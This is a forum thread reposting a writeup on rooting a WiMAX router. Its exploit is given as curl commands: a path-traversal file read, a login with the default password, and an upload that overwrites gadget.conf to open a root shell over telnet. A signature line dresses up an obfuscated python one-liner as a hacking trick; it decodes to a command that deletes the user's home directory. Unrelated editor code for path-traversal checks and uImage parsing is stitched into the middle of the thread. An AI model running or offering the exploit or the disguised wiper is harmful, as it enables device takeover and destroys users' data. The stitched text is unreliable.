Crack-wifi.com FORUM

THE SITE'S FORUM

Wifi, Backtrack, WEP and WPA cracking...


Advertisement

Visit the Wifi-highpower.com shop, your authorised Alfa Network reseller: selected Wifi hardware, Awus036h and Awus036nh USB Wifi cards, omni, yagi and panel antennas, wifi amplifiers, accessories...

#1 20-11-2013 18:21:11

spawn
Moderator
Registered: 14-01-2011
Posts: 1 006

How to root 'mobile slim' wimax router, a.k.a. 'compact egg 2'.

Retrieved from pastebin; I could not find a source.
It seems the page has been taken down, so here it is:

It's nice, they explain their method.

How to root 'mobile slim' wimax router, a.k.a. 'compact egg 2'.
# DONT DO IT THOUGH ! It's ... bad; maybe.

Just give me the hack ! => http://pastebin.com/eJExeRp9


  === WRITEUP ===

We work on Debian Linux and Arch Linux. Many thanks to the community !

As of today :
- software version for 'mobile slim' is 2324-2000-1097
- file available on http://updatems.nwcs.co.jp/update/mobileslim/IMW-C1012W_V2324_R1097KR.bin

# DONT DO IT ! Maybe you will be holding a warranty-void wibrick. Plus it's probably against the TPP.

1/ Target information gathering : Mobile Slim is Compact Egg2 (=CE2)
    INFOMARK is the real maker, see back of the device. 
    Most similar product on INFOMARK's (horrible flash hell) website is the CE2.

    CE2 is the 'Compact Egg' new iteration.
    Clearwire's iSpot was egg-based : some security holes.
    We start here : https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

    We have some common ground : webmain.cgi is still present, we seem to be running
    the same framework, we still see thttpd 2.25b.
    BUT the weak functions (act_cmd_result & configuration restore functions) are gone.
    Similarly upgrademain.cgi was removed from the cgi-bin directory and 
    telnet is absent from the busybox build. We will need to dig deeper.

2/ CE2 firmware
    Here is the CE2 firmware on INFOMARK's website :
http://www.infomark.co.kr/compactegg2/sub.php?goPage=board&boardid=1303694551_3&mode=view&no=11&start=&search_item=&search_order=&menu_code=2/7&boardcate=

3/ binwalk
    https://github.com/devttys0/binwalk

    Binwalk v1.2.3
    Craig Heffner, http://www.devttys0.com

    % binwalk B3000_V2344_R1095KR.bin
    DECIMAL         HEX             DESCRIPTION
    400             0x190           uImage header, header size: 64 bytes, header CRC: 0x2561261A, created: Mon Jun 24 17:08:36 2013, image size: 1145768 bytes, Data Address: 0xD0600000, Entry Point: 0xD0600000, data CRC: 0x74417F3E, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "Linux-2.6.38-uc0"

    16878           0x41EE          gzip compressed data, maximum compression, from Unix, last modified: Mon Jun 24 17:08:36 2013

    1147280         0x118190        Squashfs filesystem, big endian, version 2.1, size: 4654686 bytes, 916 inodes, blocksize: 65536 bytes, created: Mon Jun 24 17:13:07 2013 

    % binwalk --dd=squashfs:sqfs B3000_V2344_R1095KR.bin

4/ Firmware modkit
    https://code.google.com/p/firmware-mod-kit/

    We tried all versions of unsquashfs, starting at 2.1. They all failed.
    We tried to roll our own, we compiled tons of stuff, we fuzzed the blocks, etc, no luck ...

5/ squash7z
    We went back to binwalk.

    % binwalk B3000_V2344_R1095KR.bin -S
    DECIMAL         HEX             Strings
    80              0x50            IMW-C1001W
    128             0x80            uImage
    192             0xC0            ramdisk.squashfs7z
    432             0x1B0           Linux-2.6.38-uc0
    16215           0x3F57          Attempting division by 0!
    16241           0x3F71          Uncompressing Linux...
    [...]

    We google for 'squashfs7z', find this :
    https://code.oregonstate.edu/svn/dsp_bd/uclinux-dist/trunk/vendors/CyberGuard/vendor.mak

    We clone the repo, build the tools. They don't provide unsquashfs, we pull the source from
    another squashfs-tools distribution channel and link it in the same way they link mksquashfs.
    It works ! Very happy moment.

6/ magent - cal - getlog - webmain
    We nmapped the 'mobile slim' a long time ago, trying to find open stuff. We tried to fuzz the
    dhcpd server, we know the dns server is vulnerable to cache poisoning, we saw some stuff coming 
    out of the wimax calibration tool. We tried all the known vulns in thttpd. Impervious !
    We are no longer friends.

    % sudo nmap 192.168.1.1 -O -p1-65535
    [...]
    PORT     STATE SERVICE
    53/tcp   open  domain
    80/tcp   open  http
    8182/tcp open  unknown
    9800/tcp open  unknown
    9801/tcp open  unknown
    [...]

    We start up hex-rays.com's IDA Disassembler & try to get into 'magent' (on port 8281). Useless.

    Next we focus on webmain.cgi, and the other cgi-scripts.
    Oh. We can read files on the device with getlog.cgi !

    We read the OTA upgrade system configuration file & get the mobile slim own firmware files.
    Network Consulting does not give urls for their upgrade files, stingy. Let's release them !

7/ shell
    We take a look at upgrade.cgi next. Oh, we can push files wherever.
    We push to /system/etc/gadget.conf. Same stuff as before, plus 2 lines, granting us
    a shell through inetd.
    The scintillating smart Mobile sweetness is full of small stars !


  === EXPLOIT CODE ===

So with curl, the exploit is :

# curl -O http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../system/etc/gadget.conf
# and remove html marking
# or use gadget.conf from IMW-C1012W_V2324_R1097KR.bin 
# https://mega.co.nz/#!sJRgAILS
# key:FnfoVik0PYq23Czx90QEaR-aECVosEEY6pK0joHj4Z8

# drill
cat >>gadget.conf <<EOF 
echo "telnet stream tcp nowait root /bin/sh sh -i" > /tmp/an_awkward_situation
/usr/sbin/inetd /tmp/an_awkward_situation &
EOF

# login
curl -b "acc=1; login_page=/; language=en; uirp=3000" "http://192.168.1.1/cgi-bin/webmain.cgi?act=login&passwd=YWRtaW4%3D&login=login" -c mobile_slim.cookies.txt

# and push
curl -b "acc=1; login_page=/; language=en; uirp=3000" "http://192.168.1.1/cgi-bin/upload.cgi" -b mobile_slim.cookies.txt -F "act=upgrade" -F "type=type_skin" -F '[email protected];filename=../../system/etc/gadget.conf' --trace -

There are other security problems. Please do not open the admin pages to the outside world.

Also, small win from our lurking around in the filesystem, there is stuff to be seen here : 
http://192.168.1.1/private/menu_engineer.html


  === FILES ===

The files, this is educational content, it does not help acquiring root. See above link.

* Upgrade files (==.bin) / content of filesystem (==.tar.?z): 

    B3000_V2344_R1095KR.bin 5.5 MB
    https://mega.co.nz/#!gNZjFDTB
    key:dfHQpWJLjdCMfJMOyHYbkGv90M4p7kZnzDH398rTJZw

    B3000_V2344_R1095KR.bin.squashfs-root.tar.gz 5.5 MB
    https://mega.co.nz/#!5MZkCKQY
    key:STF_w2eVd0NNHF_AVUyZfCKqaZkNnAtie5Ew4y0XRI8


    IMW-C1012W_V2324_R1097KR.bin 6.0 MB
    https://mega.co.nz/#!IIgk0JJI
    key:BvZKJR5-aOSzCwfzjvW35mBYJphncNG6tsttvJP12Bk

    IMW-C1012W_V2324_R1097KR.bin.squashfs-root.tar.xz 3.7 MB
    https://mega.co.nz/#!BV4XVB4Y
    key:RQopOjN6QhqTz3fWbMxq3hT3JIwjNq0mn9H6uzE9k1Q

* Archived websites : 
    https://mega.co.nz/#F!tNJHiDyT
    key:HZfEuhpTrjJlJM5xZMyFRg

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"
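The two weaknesses the writeup relies on, a getlog.cgi `filename` parameter that is read without confining it to a directory and an upload handler that honours a client-supplied `filename` containing `../` components, are both path-traversal bugs. The Python below is an added example by the editor, not code from the writeup, the router firmware or the forum; it shows the containment check a CGI handler on such a device should apply on both the read side and the upload side. The directory names `LOG_DIR` and `SKIN_DIR` and the request list are constructed assumptions; only the `type_skin` upload type and the traversal string come from the post.

```python
import posixpath
from urllib.parse import unquote

# Assumed directories (not taken from the firmware): where getlog.cgi is supposed
# to read from and where a "type_skin" upload is supposed to land.
LOG_DIR = "/var/log"
SKIN_DIR = "/system/skin"


def resolve_within(base_dir, user_path):
    """Return base_dir/user_path as a normalised absolute path, or None if the
    result would leave base_dir. Purely lexical, so it needs no filesystem access."""
    if not user_path or "\0" in user_path:     # empty name or NUL-truncation trick
        return None
    if user_path.startswith("/"):              # absolute paths are never acceptable
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    # normpath collapses "../" segments; the result must lie strictly below base
    if not candidate.startswith(base + "/"):
        return None
    return candidate


def check_getlog(filename):
    """Hardened read side: the requested log file must stay under LOG_DIR.
    The parameter is percent-decoded exactly once, before the check."""
    return resolve_within(LOG_DIR, unquote(filename))


def check_upload(upload_type, filename):
    """Hardened upload side: the server chooses the directory from the upload type
    and keeps only the basename of the client-supplied filename."""
    target_dir = {"type_skin": SKIN_DIR}.get(upload_type)
    if target_dir is None:                     # unknown types are rejected, not guessed
        return None
    return resolve_within(target_dir, posixpath.basename(unquote(filename)))


# Constructed requests for the demo; the traversal string is the one in the post.
REQUESTS = [
    ("getlog", "messages"),
    ("getlog", "../../system/etc/gadget.conf"),
    ("getlog", "..%2F..%2Fsystem%2Fetc%2Fgadget.conf"),
    ("getlog", "/system/etc/gadget.conf"),
    ("upload", "logo.png"),
    ("upload", "../../system/etc/gadget.conf"),
]


def audit(requests=REQUESTS):
    """Return (kind, raw filename, resolved path or None) for each request."""
    results = []
    for kind, name in requests:
        resolved = check_getlog(name) if kind == "getlog" else check_upload("type_skin", name)
        results.append((kind, name, resolved))
    return results


if __name__ == "__main__":
    for kind, name, resolved in audit():
        print(f"{kind:7} {name!r:45} -> {resolved or 'REJECTED'}")
```

The check is lexical only: on a real device the handler should additionally resolve the final path with `os.path.realpath` and repeat the prefix test, because a symlink inside the log directory can point outside it. Note that the two sides are hardened differently: a read request names a file the caller wants, so an escaping path is refused outright, whereas an upload's client-supplied directory components carry no legitimate meaning and are simply discarded, which is why `../../system/etc/gadget.conf` lands harmlessly as `/system/skin/gadget.conf`.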
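Section 3's binwalk output locates a uImage header at offset 400 (0x190) and prints its fields together with the header and data CRCs. The Python below is an added example by the editor and not part of the writeup: it builds a small firmware blob with a constructed uImage header (the load address, entry point and image name echo the binwalk output, but the payload and its size are constructed) and then does what a firmware-integrity check does, namely scan for the magic, decode the 64-byte header and verify both CRCs. The layout follows the U-Boot legacy image header (seven big-endian u32 fields, four u8 fields, a 32-byte name).

```python
import struct
import zlib
from datetime import datetime, timezone

UIMAGE_MAGIC = 0x27051956
# U-Boot legacy image header: magic, hcrc, time, size, load, ep, dcrc, os, arch, type, comp, name
HEADER_FMT = ">IIIIIIIBBBB32s"
HEADER_SIZE = struct.calcsize(HEADER_FMT)      # 64 bytes, as binwalk reports
MAGIC_BYTES = struct.pack(">I", UIMAGE_MAGIC)

OS_NAMES = {5: "Linux"}
ARCH_NAMES = {2: "ARM"}
TYPE_NAMES = {2: "OS Kernel Image"}
COMP_NAMES = {0: "none", 1: "gzip", 2: "bzip2", 3: "lzma"}


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def build_uimage(payload, load=0xD0600000, entry=0xD0600000,
                 name=b"Linux-2.6.38-uc0", timestamp=1372093716):
    """Build a uImage (header + payload) with valid CRCs. Constructed for the demo;
    the defaults echo the load/entry/name values in the binwalk output."""
    header = struct.pack(HEADER_FMT, UIMAGE_MAGIC, 0, timestamp, len(payload),
                         load, entry, crc32(payload), 5, 2, 2, 0, name.ljust(32, b"\0"))
    # the header CRC covers the header with the hcrc field itself zeroed
    header = header[:4] + struct.pack(">I", crc32(header)) + header[8:]
    return header + payload


def find_uimage_headers(blob):
    """Offsets at which the uImage magic occurs (the signature scan binwalk performs)."""
    offsets, pos = [], blob.find(MAGIC_BYTES)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(MAGIC_BYTES, pos + 1)
    return offsets


def parse_uimage(blob, offset):
    """Decode the header at offset and verify both CRCs against the blob."""
    hdr = blob[offset:offset + HEADER_SIZE]
    if len(hdr) < HEADER_SIZE:
        raise ValueError("truncated header")
    (magic, hcrc, ts, size, load, entry, dcrc,
     os_, arch, typ, comp, name) = struct.unpack(HEADER_FMT, hdr)
    if magic != UIMAGE_MAGIC:
        raise ValueError("no uImage magic at offset %d" % offset)
    zeroed = hdr[:4] + b"\0\0\0\0" + hdr[8:]
    data = blob[offset + HEADER_SIZE:offset + HEADER_SIZE + size]
    return {
        "offset": offset,
        "created": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "size": size,
        "load": load,
        "entry": entry,
        "os": OS_NAMES.get(os_, os_),
        "arch": ARCH_NAMES.get(arch, arch),
        "type": TYPE_NAMES.get(typ, typ),
        "compression": COMP_NAMES.get(comp, comp),
        "name": name.rstrip(b"\0").decode("ascii", "replace"),
        "header_crc_ok": crc32(zeroed) == hcrc,
        # a truncated image fails here too, because fewer than `size` bytes remain
        "data_crc_ok": len(data) == size and crc32(data) == dcrc,
    }


def constructed_firmware():
    """400 bytes of filler, then a uImage: mimics the layout binwalk reported."""
    return b"\xff" * 400 + build_uimage(b"constructed kernel payload, not a real one\n" * 8)


if __name__ == "__main__":
    blob = constructed_firmware()
    for off in find_uimage_headers(blob):
        print(parse_uimage(blob, off))
```

Run against a real update file, the same `parse_uimage` call at the offset binwalk reports tells you whether the kernel image was modified after it was built: any change to a header field breaks `header_crc_ok`, and any change or truncation of the kernel bytes breaks `data_crc_ok`. A CRC is an integrity check, not an authenticity check, so it detects corruption and careless tampering but offers no defence against an attacker who recomputes it.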


#2 20-11-2013 19:12:21

Furyo
Irreplaceable Member
Registered: 25-11-2010
Posts: 1 393
Website

Re : How to root 'mobile slim' wimax router, a.k.a. 'compact egg 2'.

Thanks Spawn ;)


I will take the time to reply to people who have taken the time to introduce themselves..
Members suspected of dubious intentions will get nothing but my silence in reply.
Morpheus to Néo: you are not the best when you believe it, but when you know it..
